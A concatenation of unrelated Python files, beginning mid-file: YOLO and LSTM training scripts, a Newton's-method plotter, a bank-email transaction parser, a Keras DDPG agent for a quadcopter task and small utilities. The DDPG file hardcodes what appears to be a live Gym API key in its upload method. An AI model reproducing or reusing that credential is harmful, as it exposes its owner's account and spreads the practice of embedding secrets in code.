range(epoch):\n model.train() # Important: set training mode\n if ep == 0:\n learning_rate = 0.001\n for param_group in optimizer.param_groups:\n param_group['lr'] = learning_rate\n if ep == 20:\n learning_rate = 0.0005\n for param_group in optimizer.param_groups:\n param_group['lr'] = learning_rate\n #total_loss = 0.\n for batch_idx,(images,target) in enumerate(trainset_loader):\n images, target = images.to(device), target.to(device)\n optimizer.zero_grad() #to zero\n pred = model(images)\n loss = criterion(pred,target)\n #total_loss += loss.images[0]\n loss.backward() #backpro\n optimizer.step() #update\n #optimizer.zero_grad() #to zero\n if iteration % log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n ep, batch_idx * len(images), len(trainset_loader.dataset),\n 100. 
* batch_idx / len(trainset_loader), loss.item()))\n iteration += 1\n\n # Evaluate at the end of each epoch\n best_test_loss = validation(model,optimizer,best_test_loss,ep)\n\n\n#[8]\n# evaluate at the end of each epoch.\ndef validation(model,optimizer,best_test_loss,ep):\n model.eval()\n criterion = yoloLoss(5,0.05)\n #criterion = nn.MSELoss()\n validation_loss = 0.0\n with torch.no_grad(): # This will free the GPU memory used for back-prop\n for batch_idx,(images,target) in enumerate(testset_loader):\n images, target = images.to(device), target.to(device)\n pred = model(images)\n loss = criterion(pred,target)\n validation_loss += loss.item()\n validation_loss /= len(testset_loader)\n print (\"validation avg loss:\" + str(validation_loss) + '\\n')\n\n # save best loss as best.pth\n if best_test_loss > validation_loss:\n best_test_loss = validation_loss\n print('get best test loss %.5f' % best_test_loss)\n save_checkpoint('best.pth',model,optimizer)\n if ep%10==0:\n save_checkpoint('best_'+str(ep)+'.pth',model,optimizer)\n\n # write to logfile\n logfile.writelines(\"ep: \"+str(ep)+\" validation avg loss:\" + str(validation_loss) + \"\\n\")\n logfile.flush()\n\n return best_test_loss\n\ndef save_checkpoint(checkpoint_path, model, optimizer):\n state = {'state_dict': model.state_dict(),\n 'optimizer' : optimizer.state_dict()}\n torch.save(state, checkpoint_path)\n print('model saved to %s' % checkpoint_path)\n\n#[9]\n# It's time to train the model!\nepochs_num = 50\nnow = datetime.datetime.now()\nlogfile.writelines(\"start training at:\"+str(now)+\"\\n\")\nlogfile.flush()\ntrain(model, epochs_num)\nnow = datetime.datetime.now()\nlogfile.writelines(\"end training at:\"+str(now)+\"\\n\")\nlogfile.flush()\n","sub_path":"hw2_YOLOv1_object_detection/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"474431890","text":"import os\nimport time\nimport numpy as np\nimport csv\nimport pickle\nimport json\nimport keras.backend as K\n\nfrom keras.models import Model\nfrom keras.layers import Dense, Activation, Input, LSTM, Embedding, Dropout, TimeDistributed\nfrom keras.optimizers import RMSprop\nfrom keras.callbacks import LambdaCallback, CSVLogger, History, ModelCheckpoint\n\nfrom clean_data import tokenize_dir, clean_tokens\nfrom embed_words import train_word_model, dictionary_lookups, vectorize_words\n\n# working directory\npath = os.getcwd()\n\n# define data file and file extension\n# replace with location of data-set\ndata_path = ''\nextension = 'csv'\n\n# for saving\nversion_name = 'primary_train'\n\n# START\n# ----\n\n# LOAD DATA\n# --\n\nprint('\\nLoading data...')\n\nprint('Start-Time: ', time.ctime(time.time()))\ncorpus = tokenize_dir(data_path, extension)\nprint('End-Time: ', time.ctime(time.time()))\n\n# clean tokenize corpus\nsentences, max_sentence, max_sentence_len = clean_tokens(corpus)\n\nprint(\"max: %d \" % max_sentence_len)\n\nprint('Num sentences in original corpus:', len(corpus))\nprint('Num sentences for model:', len(sentences))\n\n# print('\\nTRAINING CORPUS: \\n' + corpus)\n\n\n# GENERATE EMBEDDINGS\n# ---------------\n\nprint('\\nCreating word embeddings...')\n# train and save the embedding model\nword_model = train_word_model(corpus, 'word_model')\n\n# get the initial model weight\nembed_weights = word_model.wv.syn0\n# get the vocab size and embedding shape for model\nvocab_size, embedding_size = embed_weights.shape\n\n# get the dictionary lookup 
functions\nword_to_index, index_to_word = dictionary_lookups(word_model)\n\n# VECTORIZE WORDS\n# ----------------\n\nprint('\\nVectorizing words...')\n# define the shape of input & output matrices\n# input shape (no sentences, max-sentence-size)\ntrain_input = np.zeros([len(sentences), max_sentence_len], dtype=np.int32)\n\n# output shape (no sentences, max-sentence-size, 1)\ntrain_output = np.zeros([len(sentences), max_sentence_len, 1], dtype=np.int32)\n\n# populate model vectors with word embedding data\ntrain_input, train_output = vectorize_words(sentences, train_input, train_output, word_to_index)\n\nprint('\\ntrain_input shape:', train_input.shape)\nprint('train_output shape:', train_output.shape)\n\n# MODEL SETUP\n# ------------------\nprint('\\nConstructing Model...')\n\n# define the model layers\nmodel_input = Input(shape=(None,))\nmodel_embed = Embedding(input_dim=vocab_size, output_dim=embedding_size, weights=[embed_weights])\nmodel_lstm_1 = LSTM(units=embedding_size, return_sequences=True, return_state=False)\nmodel_dropout_1 = Dropout(0.2)\nmodel_lstm_2 = LSTM(units=embedding_size, return_sequences=True, return_state=False)\nmodel_dropout_2 = Dropout(0.2)\nmodel_dense = TimeDistributed(Dense(units=vocab_size))\nmodel_activation = Activation('softmax')\n# Connect layers\nembedded = model_embed(model_input)\nlstm_1_output = model_lstm_1(embedded)\ndropout_1_output = model_dropout_1(lstm_1_output)\nlstm_2_output = model_lstm_2(dropout_1_output)\ndropout_2_output = model_dropout_2(lstm_2_output)\ndense_output = model_dense(dropout_2_output)\nmodel_output = model_activation(dense_output)\n\n\n# Define the model\nprimary_model = Model(model_input, model_output)\n\n# Define optimizer\nrms_prop = RMSprop(lr=0.001, rho=0.9, epsilon=None, decay=0.0)\n\n\n# Define custom evaluation metrics\ndef perplexity(y_true, y_pred):\n cross_entropy = K.sparse_categorical_crossentropy(y_true, y_pred)\n perplexity = K.pow(2.0, cross_entropy)\n # perplexity = 2 ** cross_entropy\n return perplexity\n\n\ndef crossentropy(y_true, y_pred):\n return K.sparse_categorical_crossentropy(y_true, y_pred)\n\n\n# Compile model\nprimary_model.compile(\n optimizer=rms_prop,\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy', crossentropy, perplexity])\n\n# print summary of model layers\nprint(primary_model.summary())\n\n# TRAINING SETUP\n# --------------\nprint(\"\\nVocab size: %d\" % vocab_size)\nprint(\"Embedding size: %d\" % embedding_size)\n\nbatch_size = 32\nepochs = 25\nvalidation_split = 0.2\nprint(\"\\nTraining in batches of: %d\" % batch_size)\nprint(\"Training epochs: %d\" % epochs)\n\n# start point for generated text\nstart_words = ['the', 'there', 'from', 'have', 'can',\n 'engine', 'body', 'speed', 'elegance', 'safety',\n 'fun', 'love', 'excite', 'joy', 'curious', ]\n\n\n# apply temperature to each model sample\ndef temp_sample(predictions, temperature=1.0):\n # value 0 return argmax sampling\n if temperature <= 0:\n return np.argmax(predictions)\n predictions = np.asarray(predictions).astype('float64')\n predictions = np.log(predictions) / temperature\n exp_predictions = np.exp(predictions)\n predictions = exp_predictions / np.sum(exp_predictions)\n probability = np.random.multinomial(1, predictions, 1)\n return np.argmax(probability)\n\n\n# generate sentence one word at a time - limiting to 10 words\ndef generate_next_word(text, temp, sentence_length=10):\n word_indices = [word_to_index(word) for word in text.lower().split()]\n for n in range(sentence_length):\n prediction = 
primary_model.predict(x=np.array(word_indices))\n        index = temp_sample(prediction[0, -1, :], temperature=temp)\n        word_indices.append(index)\n    return ' '.join(index_to_word(index) for index in word_indices)\n\n\n# writes prediction to file for each epoch\ndef on_epoch_end(epoch, _):\n    # declare csv objects for both sampling styles\n    wr = csv.writer(f, dialect='excel', lineterminator='\\n')\n    for text in start_words:\n        sentence = generate_next_word(text, 0)\n        wr.writerow(sentence)\n\n\n# TRAIN MODEL\n# -----------\nprint('\\nTraining Start-Time: ', time.ctime(time.time()))\n\n# calls function on every epoch end\ngenerate_callback = LambdaCallback(on_epoch_end=on_epoch_end)\n\n# writes training stats to file\ncsv_logger = CSVLogger(path + '/Logs/' + version_name + '.log')\n\nhistory = History()\n\nmodel_check = ModelCheckpoint(path + '/Models/' + version_name + '_.{epoch:02d}.hdf5',\n                              monitor='val_perplexity',\n                              verbose=1,\n                              save_best_only=False,\n                              save_weights_only=False,\n                              mode='auto',\n                              period=1)\n\nwith open(path + '/Output/' + version_name + '.csv', 'w') as f:\n    hist = primary_model.fit(train_input,\n                             train_output,\n                             batch_size=batch_size,\n                             verbose=1,\n                             shuffle='batch',\n                             epochs=epochs,\n                             validation_split=validation_split,\n                             callbacks=[generate_callback, csv_logger, history])\n\nprint('\\nTraining Finish Time: ', time.ctime(time.time()))\n\n# SAVE MODEL\n# -----------\n\nwith open(path + '/Logs/' + version_name + '_train_history.pkl', 'wb') as file:\n    pickle.dump(hist.history, file)\n\nprint(\"\\nSaving trained model...\")\nprimary_model.save(path + '/Models/' + version_name + '.h5')\n\nprint(\"\\nSaving model weights...\")\nprimary_model.save_weights(path + '/Models/' + version_name + '_weights.h5')\n\nprint(\"\\nSaving model to JSON...\")\nmodel_json_string = primary_model.to_json()\nwith open(path + '/Models/' + version_name + '.json', \"w\") as f_j:\n    json.dump(json.loads(model_json_string), f_j, indent=4)\n\nprint(\"\\nAll done!\")\n","sub_path":"primary.py","file_name":"primary.py","file_ext":"py","file_size_in_byte":7339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"337831775","text":"from matplotlib import pyplot as plt\nimport numpy as np\nfrom tools import FirstDerivative, SecondDerivative, GetA, GetInverseMatrix\nfrom functions import fun2, fun1, fun3, fun4, fun5, fun6, fun7, fun8\n\ndef fun(x1, x2):\n    return x1**2 + 25*x2**2\n\ndef display(x_range, y_range, function, a=1, X0=None, delta=0.01):\n    if X0 is None:\n        X0 = [5, 5]\n\n    fig = plt.figure(figsize=(7, 7))  # create a new set of 3D axes\n    ax3 = plt.axes(projection='3d')\n\n    # define the 3D data\n    xx = np.arange(x_range[0], x_range[1], 0.5)\n    yy = np.arange(y_range[0], y_range[1], 0.5)\n    X, Y = np.meshgrid(xx, yy)\n    Z = function(X, Y)\n\n    ax3.contour(X, Y, Z, 20, zdim='z', offset=-2, cmap='rainbow')  # contour plot; offset must be set to the minimum of Z\n    ax3.plot_wireframe(X, Y, Z, color='gray')\n\n    X = np.array([[X0[0]], [X0[1]]])\n    X_new = np.array([[float('inf')], [float('inf')]])\n\n    count = 0\n    grad_list = []\n    fx = []\n\n    while abs((X[0, 0] - X_new[0, 0]) ** 2 + (X[1, 0] - X_new[1, 0]) ** 2) > delta:\n        if count != 0:  # when count == 0, X_new has not been updated yet, so it cannot be assigned to X\n            X = X_new\n\n        fx.append(function(X[0, 0], X[1, 0]))\n        grad = np.array(FirstDerivative(X[0, 0], X[1, 0], function)).reshape(2, 1)  # compute the gradient\n        grad_list.append(grad)\n\n        # !!! if the gradient is zero here, the current point is a stationary point !!!\n        if abs(grad[0, 0]) < 0.001 and abs(grad[1, 0]) < 0.001:\n            # if a small perturbation gives a larger value, treat this point as a local minimum\n            if function(X[0, 0] + delta, X[1, 0] + delta) > function(X[0, 0], X[1, 0]):\n                print(\"optimal point\")\n                ax3.scatter3D(X[0, 0], X[1, 0], function(X[0, 0], X[1, 0]), c='y', label='optimal point', s=50)\n                break\n\n        ax3.scatter3D(X[0, 0], X[1, 0], function(X[0, 0], X[1, 0]), c='g', s=50)\n\n        second_derivative = SecondDerivative(X[0, 0], X[1, 0], function)  # compute the second derivative (Hessian)\n        inverse_matrix = GetInverseMatrix(second_derivative)  # invert the Hessian matrix\n\n        X_new = np.array(X) - a * np.matmul(inverse_matrix, grad)  # a is the descent step size\n\n        count += 1\n\n        plt.pause(0.4)\n\n    ax3.scatter3D(X_new[0, 0], X_new[1, 0], function(X_new[0, 0], X_new[1, 0]), c='r', label='optimal point', s=50)\n\n    if X_new[0] == float('inf') and X_new[1] == float('inf'):\n        X_new = X\n\n    if count == 0:\n        count += 1\n    print(\"Iterated {:} times in total\\nMinimum point: ({:.2f},{:.2f})\\nMinimum value: {:.2f}\"\n          .format(count, float(X_new[0, 0]), float(X_new[1, 0]), float(function(X_new[0, 0], X_new[1, 0]))))\n    print(grad_list)\n    print(\"fx = \", fx)\n\n    ax3.set_xlabel('x')\n    ax3.set_ylabel('y')\n    ax3.set_zlabel('z')\n    ax3.set_title('3D contour')\n    plt.show()\n\n\nif __name__ == \"__main__\":\n    display((-5, 10), (-5, 7), fun, X0=[2, 2])\n","sub_path":"无约束优化方法/牛顿型方法.py","file_name":"牛顿型方法.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"210721300","text":"import argparse\nparser = argparse.ArgumentParser(description = 'Square a number')\nparser.add_argument(\"square\", help=\"display a square of a given number\",\n                    type=int)\ndef main():\n    args = parser.parse_args()\n    return args.square**2\n\nif __name__ == \"__main__\":\n    main()","sub_path":"tests/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"100136323","text":"from bs4 import BeautifulSoup\n\n\nclass BoFA:\n    def parse(self, transaction_html):\n        soup = BeautifulSoup(transaction_html, \"html.parser\")\n\n        amount_element = soup.find(\"td\", text=\" Amount: \")\n        transaction_dict = {}\n\n        if amount_element is not None:\n            transaction_amount = amount_element.find_parent().find_all('td')[-1].next_element.strip()\n            transaction_dict[\"amount\"] = transaction_amount\n        else:\n            return\n\n        merchant_element = soup.find(\"td\", text=\" Merchant: \")\n\n        if merchant_element is not None:\n            transaction_merchant = merchant_element.find_parent().find_all('td')[-1].next_element.strip()\n            transaction_dict[\"merchant\"] = transaction_merchant\n\n        date_element = soup.find(\"td\", text=\" Transaction date: \")\n\n        if date_element is not None:\n            transaction_date = date_element.find_parent().find_all('td')[-1].next_element.strip()\n            transaction_dict[\"date\"] = transaction_date\n\n        transaction_dict[\"card\"] = \"BoFA Card\"\n\n        return transaction_dict\n","sub_path":"gmail/api/card_parsers/bofa_parser.py","file_name":"bofa_parser.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"5946397","text":"from __future__ import print_function\n\n# Deep Deterministic Policy Gradient Method\n# David Silver et al.\n\n# implemented in plain Keras, by Qin Yongliang\n# 2017 01 13\n\n'''\nsummary\n\n0. s for state, a for action, r for reward,\n    q for 'action_quality', or expectation of sum of discounted future reward.\n\n1. you have 2 network, Mr. actor and Mr. critic\n    - Mr. actor generate actions: a = actor(s)\n    - Mr. critic score (state,action) pairs: q = critic(s,a)\n\n    >in literature, Mr. actor is function mu(s), Mr. critic is function Q(s,a)\n\n2. 
you improve Mr. critic by using Bellman equation, or what they call TD-learning\n - Q(s1,a1) := r1 + gamma * Q(s2,a2) where a2 = actor(s2)\n - train Mr. critic to predict the calculated Q(s1,a1) given s1 and a1, using gradient descent and MSE loss.\n\n3. after that, improve Mr. actor by gradient ascent w.r.t. Q(s,a)\n - a1_maybe = actor(s1), q1_maybe = critic(s1,a1_maybe)\n - therefore q1_maybe = critic(s1,actor(s1)). we want to increase q1_maybe!!\n - then figure out what is the gradient of actor w.r.t. q1_maybe,\n using tf.gradient() or by compositing Keras Models (as I did, to keep things clean)\n - then do gradient ascent to increase Mr. actor's actions' q-value\n\n4. to stabilize the whole learning process:\n - random sampling of training examples from replay memory\n - use 'target' networks that are copy of actor and critic,\n their weights gradually shift towards the weights of the real actor and critic\n to reduce self-correlation/oscillation (well, if you know control theory)\n - add noise to actor's output in the beginning of learning, to turn deterministic actions into probabilistic ones\n - that's basically it\n\n5. now go master the game of Gym\n'''\n\n'''\npersonal tricks:\n\ncheck the Residual Dense Unit, it works!\n'''\n\n# gym boilerplate\nimport numpy as np\nimport gym\nfrom gym import wrappers\nfrom gym.spaces import Discrete, Box\n\n# keras boilerplate: the simplest way to neural networking\nfrom keras.models import *\nfrom keras.layers import *\nfrom keras.optimizers import *\nimport keras\nfrom math import *\nimport random\nimport keras.backend as K\nimport time\n\nfrom collections import deque\n\nfrom task import Task\n\n# replay buffer per http://pemami4911.github.io/blog/2016/08/21/ddpg-rl.html\nclass rpm(object):\n #replay memory\n def __init__(self,buffer_size):\n self.buffer_size = buffer_size\n self.count = 0\n self.buffer = deque()\n\n def add(self, tup):\n experience = tup\n if self.count < self.buffer_size:\n self.buffer.append(experience)\n self.count += 1\n else:\n self.buffer.popleft()\n self.buffer.append(experience)\n\n def size(self):\n return self.count\n\n def sample_batch(self, batch_size):\n '''\n batch_size specifies the number of experiences to add\n to the batch. 
If the replay buffer has less than batch_size\n elements, simply return all of the elements within the buffer.\n Generally, you'll want to wait until the buffer has at least\n batch_size elements before beginning to sample from it.\n '''\n batch = []\n\n if self.count < batch_size:\n batch = random.sample(self.buffer, self.count)\n else:\n batch = random.sample(self.buffer, batch_size)\n\n item_count = len(batch[0])\n res = []\n for i in range(item_count):\n k = np.array([item[i] for item in batch])\n if len(k.shape)==1: k = k.reshape(k.shape+(1,))\n res.append(k)\n return res\n\n# residual dense unit\ndef resdense(features):\n def unit(i):\n hfeatures = max(4,int(features/4))\n\n ident = i\n i = Dense(features,activation='tanh')(i)\n\n ident = Dense(hfeatures)(ident)\n ident = Dense(features)(ident)\n\n return add([ident,i])\n return unit\n\nclass nnagent(object):\n def __init__(self,\n \ttask,\n \tdiscount_factor,\n \toptimizer\n ):\n self.rpm = rpm(1000000) # 1M history\n \n\n self.inputdims = task.state_size\n # assume observation_space is continuous\n\n # if isinstance(action_space,Box): # if action space is continuous\n\n low = task.action_low\n high = task.action_high\n\n num_of_actions = task.action_size\n\n self.action_bias = (high+low)/2.\n self.action_multiplier = high - self.action_bias\n\n # say high,low -> [2,7], then bias -> 4.5\n # mult = 2.5. then [-1,1] multiplies 2.5 + bias 4.5 -> [2,7]\n\n self.is_continuous = True\n\n def clamper(env,actions):\n return np.clip(actions,a_max=env.action_high,a_min=env.action_low)\n\n self.clamper = clamper\n # else:\n # num_of_actions = action_space.n\n\n # self.action_bias = .5\n # self.action_multiplier = .5 # map (-1,1) into (0,1)\n\n # self.is_continuous = False\n\n self.outputdims = num_of_actions\n\n self.discount_factor = discount_factor\n self.optimizer = optimizer\n\n ids,ods = self.inputdims,self.outputdims\n self.actor = self.create_actor_network(ids,ods)\n self.critic, self.frozen_critic = self.create_critic_network(ids,ods)\n\n print('inputdims:{}, outputdims:{}'.format(ids,ods))\n print('actor network:')\n self.actor.summary()\n print('critic network:')\n self.critic.summary()\n\n # target networks: identical copies of actor and critic\n self.actor_target = self.create_actor_network(ids,ods)\n self.critic_target, self.frozen_critic_target = self.create_critic_network(ids,ods)\n\n self.replace_weights(tau=1.)\n\n # now the dirty part: the actor trainer --------------------------------\n\n # explaination of this part is written in the train() method\n\n s_given = Input(shape=(self.inputdims,))\n a1_maybe = self.actor(s_given)\n q1_maybe = self.frozen_critic([s_given,a1_maybe])\n # frozen weight version of critic. 
so we can train only the actor\n\n actor_trainer = Model(input=s_given,output=q1_maybe)\n\n # use negative of q1_maybe as loss (so we can maximize q by minimizing the loss)\n def neg_q1(y_true,y_pred):\n return - y_pred # neat!\n\n actor_trainer.compile(optimizer=self.optimizer,loss=neg_q1)\n self.actor_trainer = actor_trainer\n # dirty part ended -----------------------------------------------------\n\n # (gradually) replace target network weights with online network weights\n def replace_weights(self,tau=0.002):\n theta_a,theta_c = self.actor.get_weights(),self.critic.get_weights()\n theta_a_targ,theta_c_targ = self.actor_target.get_weights(),self.critic_target.get_weights()\n\n # mixing factor tau : we gradually shift the weights...\n theta_a_targ = [theta_a[i]*tau + theta_a_targ[i]*(1-tau) for i in range(len(theta_a))]\n theta_c_targ = [theta_c[i]*tau + theta_c_targ[i]*(1-tau) for i in range(len(theta_c))]\n\n self.actor_target.set_weights(theta_a_targ)\n self.critic_target.set_weights(theta_c_targ)\n\n # a = actor(s) : predict actions given state\n def create_actor_network(self,inputdims,outputdims):\n inp = Input(shape=(inputdims,))\n i = inp\n i = resdense(32)(i)\n i = resdense(32)(i)\n i = resdense(64)(i)\n i = resdense(outputdims)(i)\n # map into (0,1)\n i = Activation('tanh')(i)\n # map into action_space\n i = Lambda(lambda x:x * self.action_multiplier + self.action_bias)(i)\n\n out = i\n model = Model(input=inp,output=out)\n model.compile(loss='mse',optimizer=self.optimizer)\n return model\n\n # q = critic(s,a) : predict q given state and action\n def create_critic_network(self,inputdims,actiondims):\n inp = Input(shape=(inputdims,))\n act = Input(shape=(actiondims,))\n i = merge([inp,act],mode='concat')\n\n i = resdense(64)(i)\n i = resdense(32)(i)\n i = resdense(32)(i)\n i = resdense(1)(i)\n out = i\n model = Model(input=[inp,act],output=out)\n model.compile(loss='mse',optimizer=self.optimizer)\n\n # now we create a frozen_model,\n # that uses the same layers with weights frozen when trained.\n for i in model.layers:\n i.trainable = False # froze the layers\n\n frozen_model = Model(input=[inp,act],output=out)\n frozen_model.compile(loss='mse',optimizer=self.optimizer)\n\n return model,frozen_model\n\n def train(self,verbose=1):\n memory = self.rpm\n critic,frozen_critic = self.critic,self.frozen_critic\n actor = self.actor\n batch_size = 64\n\n if memory.size() > batch_size:\n #if enough samples in memory\n\n # sample randomly a minibatch from memory\n [s1,a1,r1,isdone,s2] = memory.sample_batch(batch_size)\n # print(s1.shape,a1.shape,r1.shape,isdone.shape,s2.shape)\n\n # a2_targ = actor_targ(s2) : what will you do in s2, Mr. old actor?\n a2 = self.actor_target.predict(s2)\n\n # q2_targ = critic_targ(s2,a2) : how good is action a2, Mr. old critic?\n q2 = self.critic_target.predict([s2,a2])\n\n # if a2 is q2-good, then what should q1 be?\n # Use Bellman Equation! 
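(see the numeric check below)\n            # a quick check with illustrative numbers (not from a real run):\n            # with r1 = 1.0, gamma = 0.995, q2 = 10.0 and isdone = 0 the target\n            # is 1.0 + 0.995 * 10.0 = 10.95; with isdone = 1 the (1 - isdone)\n            # factor drops the bootstrap term and the target collapses to r1.\n            # 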
(recursive definition of q-values)\n # if not last step of episode:\n # q1 = (r1 + gamma * q2)\n # else:\n # q1 = r1\n\n q1_target = r1 + (1-isdone) * self.discount_factor * q2\n # print(q1_target.shape)\n\n # train the critic to predict the q1_target, given s1 and a1.\n critic.fit([s1,a1],q1_target,\n batch_size=batch_size,\n nb_epoch=1,\n verbose=verbose,\n shuffle=False\n )\n\n # now the critic can predict more accurate q given s and a.\n # thanks to the Bellman equation, and David Silver.\n\n # with a better critic, we can now improve our actor!\n\n if False: # the following part is for explaination purposes\n\n # a1_pred = actor(s1) : what will you do in s1, Mr. actor?\n a1_maybe = actor.predict(s1)\n # this action may not be optimal. now let's ask the critic.\n\n # what do you think of Mr. actor's action on s1, Mr. better critic?\n q1_maybe = critic.predict([s1,a1_maybe])\n\n # what should we do to the actor, to increase q1_maybe?\n # well, calculate the gradient of actor parameters\n # w.r.t. q1_maybe, then do gradient ascent.\n\n # so let's build a model that trains the actor to output higher q1_maybe values\n\n s_given = Input(shape=(self.inputdims,))\n a1_maybe = actor(s_given)\n q1_maybe = frozen_critic([s_given,a1_maybe])\n # frozen weight version of critic. so we only train the actor\n\n actor_trainer = Model(input=s_given,output=q1_maybe)\n\n # use negative of q1_maybe as loss (so we can maximize q by minimizing the loss)\n def neg_q1(y_true,y_pred):\n return - y_pred # neat!\n\n actor_trainer.compile(optimizer=self.optimizer,loss=neg_q1)\n\n else: # the actor_trainer is already initialized in __init__\n actor_trainer = self.actor_trainer\n\n actor_trainer.fit(s1,\n np.zeros((batch_size,1)), # useless target label\n batch_size=batch_size,\n nb_epoch=1,\n verbose=verbose,\n shuffle=False\n )\n\n # now both the actor and the critic have improved.\n self.replace_weights()\n\n else:\n pass\n # print('# no enough samples, not training')\n\n def feed_one(self,tup):\n self.rpm.add(tup)\n\n # gymnastics\n def play(self,env,max_steps=-1,realtime=False,render=True,noise_level=0.): # play 1 episode\n max_steps = max_steps if max_steps > 0 else 5000\n steps = 0\n total_reward = 0\n\n # stack a little history to ensure markov property\n # LSTM will definitely be used here in the future...\n global que # python 2 quirk\n que = np.zeros((self.inputdims,),dtype='float32') # list of recent history actions\n\n def quein(observation):\n global que # python 2 quirk\n length = que.shape[0]\n que = np.hstack([que,observation])[-length:]\n\n # what the agent see as state is a stack of history observations.\n\n observation = env.reset()\n quein(observation) # quein o1\n lastque = que.copy() # s1\n\n while True and steps <= max_steps:\n steps +=1\n\n # add noise to our actions, since our policy by nature is deterministic\n exploration_noise = np.random.normal(loc=0.,scale=noise_level,size=(self.outputdims,))\n\n action = self.act(lastque) # a1\n action += exploration_noise\n action = self.clamper(env,action)\n\n # o2, r1,\n observation, reward, done = env.step(action)\n\n # d1\n isdone = 1 if done else 0\n total_reward += reward\n\n quein(observation) # quein o2\n nextque = que.copy() # s2\n\n # feed into replay memory\n self.feed_one((lastque,action,reward,isdone,nextque)) # s1,a1,r1,isdone,s2\n\n lastque = nextque\n\n # if render and (steps%10==0 or realtime==True): env.render()\n if done :\n break\n\n verbose= 2 if steps==1 else 0\n self.train(verbose=verbose)\n\n print('episode done 
in',steps,'steps, total reward',total_reward)\n return\n\n # one step of action, given observation\n def act(self,observation):\n actor = self.actor\n obs = np.reshape(observation,(1,len(observation)))\n actions = actor.predict([obs])[0]\n return actions\n\nclass playground(object):\n def __init__(self,envname):\n self.envname=envname\n env = gym.make(envname)\n self.env = env\n\n self.monpath = './experiment-'+self.envname\n\n def wrap(self):\n from gym import wrappers\n self.env = wrappers.Monitor(self.env,self.monpath,force=True)\n\n def up(self):\n self.env.close()\n gym.upload(self.monpath, api_key='sk_ge0PoVXsS6C5ojZ9amTkSA')\n\n# p = playground('Pendulum-v0')\n\ntarget_pos = np.array([0., 0., 10.])\ntask= Task(target_pos = target_pos)\nagent = nnagent(task,\ndiscount_factor=.995,\noptimizer=RMSprop()\n)\n\ndef r(ep):\n e = task\n for i in range(ep):\n noise_level = max(3e-2,(50.-i)/50.)\n print('ep',i,'/',ep,'noise_level',noise_level)\n agent.play(e,max_steps=1000,noise_level=noise_level)\n\n\nr(100)","sub_path":"Quadcopter /nnagent/Pendulum-v0.py","file_name":"Pendulum-v0.py","file_ext":"py","file_size_in_byte":14918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"11437665","text":"import numpy as np\r\nimport random\r\n\r\ndef gridGen(image, things_dict, gridShape, end = None):\r\n imageHeight, imageWidth = image.shape[:2]\r\n gridWidth, gridHeight = gridShape\r\n grid = np.zeros((gridHeight, gridWidth), np.uint8)\r\n things_dict_temp = things_dict.copy()\r\n if end:\r\n del things_dict_temp[end[0]]\r\n\r\n for key in things_dict_temp:\r\n thing = things_dict_temp[key]\r\n xBoundList = [int(imageWidth / gridWidth * cnt) for cnt in range(gridWidth + 1)]\r\n yBoundList = [int(imageHeight / gridHeight * cnt) for cnt in range(gridHeight + 1)]\r\n\r\n yVals, xVals = np.where(thing.mask == 255)\r\n for _ in range(int(len(xVals) / 5)):\r\n index = random.randint(0, len(xVals) - 1)\r\n xVal = xVals[index]\r\n yVal = yVals[index]\r\n\r\n gridX, gridY = _inGrid((xVals[index], yVals[index]), (xBoundList, yBoundList))\r\n\r\n if key[0] == 'G' and len(key) == 2:\r\n grid[gridY, gridX] = 1\r\n elif key[0] == 'R' and len(key) == 2:\r\n grid[gridY, gridX] = 2\r\n return grid\r\n\r\ndef locations(image, things_dict, gridShape):\r\n imageHeight, imageWidth = image.shape[:2]\r\n gridWidth, gridHeight = gridShape\r\n\r\n xBoundList = [int(imageWidth / gridWidth * cnt) for cnt in range(gridWidth + 1)]\r\n yBoundList = [int(imageHeight / gridHeight * cnt) for cnt in range(gridHeight + 1)]\r\n\r\n things_info = {}\r\n robot_info = None\r\n for key in things_dict:\r\n if key == 'ROBOT':\r\n thing_temp = things_dict[key]\r\n gridX, gridY = _inGrid((thing_temp.cX, thing_temp.cY), (xBoundList, yBoundList))\r\n\r\n robot_info = (gridY, gridX)\r\n else:\r\n thing_temp = things_dict[key]\r\n gridX, gridY = _inGrid((thing_temp.cX, thing_temp.cY), (xBoundList, yBoundList))\r\n\r\n things_info[key] = (gridY, gridX)\r\n\r\n return robot_info, things_info\r\n\r\ndef _inGrid(coord, bounds):\r\n xBoundList, yBoundList = bounds\r\n xVal, yVal = coord\r\n\r\n temp_x = xBoundList.copy()\r\n temp_y = yBoundList.copy()\r\n\r\n temp_x.append(xVal)\r\n temp_x.sort()\r\n gridX = temp_x.index(xVal) - 1\r\n\r\n temp_y.append(yVal)\r\n temp_y.sort()\r\n gridY = temp_y.index(yVal) - 1\r\n\r\n return gridX, gridY\r\n","sub_path":"Desk Arranging 
Robot/robotController_v20190828/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":2286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"77201751","text":"# -*- coding: utf-8 -*-\nclass Solution(object):\n    def backspaceCompare(self, S, T):\n        \"\"\"\n        Solution: Stack\n        Time Complexity: O(n)\n        Space Complexity: O(n)\n        Inspired By: MySELF!! (36ms, beat 15.08%)\n        :type S: str\n        :type T: str\n        :rtype: bool\n        \"\"\"\n        def evaluate(target):\n            stack = []\n            for char in target:\n                if char != '#':\n                    stack.append(char)\n                elif stack:\n                    stack.pop()\n                else:\n                    stack = []\n            return stack\n\n        return evaluate(S) == evaluate(T)\n\n","sub_path":"844. Backspace String Compare/Stack.py","file_name":"Stack.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
